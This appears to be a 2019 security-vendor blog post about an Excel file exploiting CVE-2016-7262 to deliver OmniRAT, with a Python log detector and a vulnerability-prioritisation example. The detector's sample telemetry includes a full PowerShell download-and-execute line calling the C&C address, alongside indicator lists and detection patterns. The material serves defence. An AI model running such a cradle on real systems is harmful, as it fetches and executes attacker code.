Kuwait Oil Company Spreadsheet Delivering OmniRAT to OT Networks
Marina Kidron Jan 30, 2019
What do a business profile for the Kuwait Oil Company, a 2016 remote code execution vulnerability and OmniRAT all have in common? An Excel spreadsheet, of course.
Beware Kuwait Oil Company Business Profile.xlsx
In January 2019, MalCrawler announced it had discovered a malicious Excel spreadsheet. Titled “Kuwait Oil Company Business Profile.xlsx,” the file exploited CVE-2016-7262, an old remote code execution vulnerability with an available fix that was already known to have been exploited in the wild more than a year earlier in a separate Russian campaign.
Kuwait Oil Company Link to OmniRAT
When the malicious Excel file is opened, it exploits the vulnerability to run PowerShell code that downloads additional instructions, communicating with the 126.96.36.199 command and control (C&C) server.
According to MalCrawler, a public any.run report of an earlier sample communicating with the same C&C address shows that the address is also used by a different malicious file, named mcafee1.exe, which in turn communicates with the pdpaso.omnirat.cf domain. This tidbit links the recent exploit surprisingly and suspiciously to the OmniRAT malware.
OmniRAT, the popular remote access trojan (RAT), has been available at bargain-basement prices ($25 to hire) since 2015. The RAT targets Android, Linux, Mac and Windows machines and is usually used to control successfully hacked computers.
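The execution chain described above (Excel opens, PowerShell is spawned, additional instructions are fetched from the C&C) leaves a recognisable trail in process-creation telemetry. As an added example that is not part of MalCrawler's or Skybox's analysis, the following detector scans constructed log records in an assumed `key=value|key=value` format for an Office parent spawning PowerShell, a download-style command line, and contact with the indicators named in this post:

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Indicators quoted in the write-up above (the defanged kockw[.]us is written plainly).
IOCS = {"126.96.36.199", "pdpaso.omnirat.cf", "kockw.us"}
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Command-line fragments typical of a PowerShell stage that pulls further instructions.
DOWNLOAD_PATTERNS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|net\.webclient|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)

@dataclass
class Finding:
    rule: str
    detail: str

def parse_event(line: str) -> dict:
    """Parse one 'Key=Value|Key=Value' record (assumed format; values must not contain '|')."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields

def check_event(ev: dict) -> list[Finding]:
    """Apply the three rules to a single parsed event and return every rule that fires."""
    findings = []
    parent = ev.get("parentimage", "").rsplit("\\", 1)[-1].lower()
    child = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("commandline", "")
    if parent in OFFICE_PARENTS and child == "powershell.exe":
        findings.append(Finding("office_spawns_powershell", f"{parent} -> {child}"))
        if DOWNLOAD_PATTERNS.search(cmd):
            findings.append(Finding("powershell_download_stage", cmd))
    if ev.get("destination", "").lower() in IOCS:
        findings.append(Finding("known_c2_contact", ev["destination"]))
    return findings

def scan(lines: list[str]) -> list[tuple[int, Finding]]:
    """Run check_event over every record; returns (record index, finding) pairs."""
    return [(i, f) for i, line in enumerate(lines) for f in check_event(parse_event(line))]

# Constructed sample telemetry: two benign records, then the chain this post describes.
SAMPLE_LOG = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|CommandLine=EXCEL.EXE Kuwait Oil Company Business Profile.xlsx",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell Get-Process",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -nop -c IEX((New-Object Net.WebClient).DownloadString('http://126.96.36.199/i'))|Destination=126.96.36.199",
]
```

Running `scan(SAMPLE_LOG)` yields nothing for the first two records and all three rules for the third.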
Suspected Target and Culprit
The attack appears to have been in its early stages and many questions remain unanswered. However, our sleuth senses at the Skybox Research Lab were tingling at the name of the weaponized file (Kuwait Oil Company Business Profile) and at a very specific domain name used to communicate with its C&C — kockw[.]us is very similar to the official domain of the Kuwait Oil Company website, kockw.com.
It’s likely the targets of this campaign are businesses working closely with the Kuwait Oil Company, which may point to the likely culprit.
In the past, Iran has been known to target its neighbors’ operational technology (OT) networks, especially using multiple variants of the Shamoon malware (recently its third iteration was put to use against Saipem). The malicious Excel attack may well be another weapon in the same cyber war.
Old Vulnerabilities, New Tricks
The vulnerability at the center of this attack affected multiple versions of Excel, and it was officially fixed by Microsoft in December 2016. That didn’t stop successful exploits in 2017. Perhaps that’s because the vulnerability holds a CVSS base score of 7.8, making it high — not critical — severity. For vulnerability management programs that prioritize remediation of critical-severity vulnerabilities only, CVE-2016-7262 likely sat unpatched despite being known to be successfully attacked. And therein lies the problem of basing a prioritization strategy solely on static, generic scoring systems.
That attempts are still being made to exploit this vulnerability is concerning, and points to the possibility that many organizations may not fully comprehend the danger it poses to their OT infrastructure.
The Case for a Risk-Based Approach
To focus on the small subset of vulnerabilities most likely to be used in an attack, it’s critical to contextualize vulnerabilities with the latest threat intelligence.
Download your free copy of the Gartner analyst report, Implement a Risk-Based Approach to Vulnerability Management. And see how Skybox goes even further than threat-focused contextualization, highlighting exposed vulnerabilities within your infrastructure as well.
Skybox’s threat-centric vulnerability management (TCVM) approach provides a systemic process to do just that. In the case of CVE-2016-7262, after the Russian December 2017 attack demonstrated it could be exploited in the wild, Skybox automatically escalated the vulnerability’s threat level to an imminent threat, putting it at the top of to-fix lists.
By correlating threat intelligence to your vulnerability occurrences, you’ll ensure the right vulnerabilities are being prioritized for remediation, no matter their age or baseline score.
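The argument of the last two sections, as an added worked example that is not Skybox’s product logic: a simplified, assumed banding scheme in which confirmed in-the-wild exploitation escalates a vulnerability to “imminent” regardless of its CVSS score, and exposure lifts a high to critical. The inventory is constructed; only CVE-2016-7262 and its 7.8 score come from the post, the other two CVE identifiers are placeholders.

```python
from dataclasses import dataclass

LEVELS = ["low", "medium", "high", "critical", "imminent"]  # ascending urgency

@dataclass
class Vuln:
    cve: str
    cvss: float                      # static CVSS base score
    exploited_in_wild: bool = False  # from a threat-intelligence feed
    exposed: bool = False            # reachable from an untrusted zone per the network model

def static_level(v: Vuln) -> str:
    """Generic CVSS-only banding: a 7.8 lands in 'high' and never reaches 'critical'."""
    if v.cvss >= 9.0:
        return "critical"
    if v.cvss >= 7.0:
        return "high"
    if v.cvss >= 4.0:
        return "medium"
    return "low"

def contextual_level(v: Vuln) -> str:
    """Threat-centric banding (assumed scheme): exploitation in the wild trumps the score;
    exposure promotes a 'high' finding to 'critical'."""
    if v.exploited_in_wild:
        return "imminent"
    base = static_level(v)
    if v.exposed and base == "high":
        return "critical"
    return base

def prioritize(vulns: list, scorer) -> list:
    """Order a to-fix list most urgent first, breaking ties on CVSS."""
    return sorted(vulns, key=lambda v: (LEVELS.index(scorer(v)), v.cvss), reverse=True)

# Constructed inventory: the post's CVE plus two placeholder entries.
INVENTORY = [
    Vuln("CVE-2016-7262", 7.8, exploited_in_wild=True, exposed=True),
    Vuln("CVE-EXAMPLE-A", 9.8),                 # critical by score, no known exploitation
    Vuln("CVE-EXAMPLE-B", 7.5, exposed=True),   # high by score, but reachable from outside
]

def fix_order(scorer) -> list:
    """Return the CVE identifiers in the order a given scorer would have them fixed."""
    return [v.cve for v in prioritize(INVENTORY, scorer)]
```

With `static_level`, the placeholder 9.8 tops the list and CVE-2016-7262 waits behind it; with `contextual_level`, the exploited-in-the-wild CVE-2016-7262 moves to the front.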
Secure Your OT Network
As this attack is likely targeting oil producers with OT networks, critical infrastructure organizations should take heed. To effectively secure OT networks, the first step is gaining visibility: understanding the connections between the OT and IT environments and how risk could spread from one to the other.
Another crucial improvement to OT security is improving patch prioritization. The number one concern for engineers in charge of OT networks is uptime; taking a device down to test and install a patch is a hard sell. But if vulnerabilities — and their patches — are properly prioritized by risk, remediation can be well planned and aligned with scheduled downtime.
OT attacks are steadily on the rise, according to a recent research report by Skybox Research Lab. Read the full report here.